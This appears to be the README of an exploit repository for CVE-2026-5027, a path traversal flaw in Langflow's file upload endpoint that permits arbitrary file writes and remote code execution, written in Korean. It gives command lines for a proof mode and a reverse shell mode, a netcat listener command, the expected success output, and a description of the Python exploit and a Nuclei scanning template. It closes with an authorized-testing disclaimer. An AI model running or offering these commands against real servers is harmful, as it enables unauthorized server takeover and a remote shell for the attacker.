
CVE-2026-5027
임의 파일 쓰기를 통한 RCE
파일 업로드를 통한 인증 없는 원격 코드 실행
Langflow의 파일 업로드 엔드포인트(POST /api/v2/files)에 심각한 경로 순회 취약점이 존재합니다.
공격자는 ../ 시퀀스가 포함된 악의적인 파일명을 전송하여 서버 파일시스템의 어디에든 임의 파일을 작성할 수 있습니다.
이는 웹셸을 배포하거나 crontab에 주입하는 등의 방식으로 완전한 원격 코드 실행(RCE) 으로 쉽게 이어집니다.
/tmp에 테스트 파일 작성)python3 CVE-2026-5027.py -t http://target:7860/ --proof
취약한 경우 예상 출력:
[+] Success! File written: ../../../tmp/CVE-2026-5027-proof.txt
# Start listener
nc -lvnp 4444
# Run exploit
python3 CVE-2026-5027.py -t http://target:7860/ --lhost YOUR_IP --lport 4444
| 파일 | 설명 |
|---|---|
CVE-2026-5027.py | 메인 Python 익스플로잇 (PoC + RCE) |
CVE-2026-5027.yaml | 스캔용 Nuclei 템플릿 |
README.md | 이 파일 |
증명 모드
python3 CVE-2026-5027.py -t http://target.com/ --proof
리버스 셸 모드
python3 CVE-2026-5027.py -t http://target.com/ --lhost 192.168.1.100 --lport 4444
이 저장소는 교육 및 승인된 보안 테스트 목적으로만 제공됩니다.
책임감 있게 사용하고, 명시적 테스트 허가를 받은 시스템에서만 사용하십시오.
레드팀 커뮤니티를 위해 ❤️로 제작되었습니다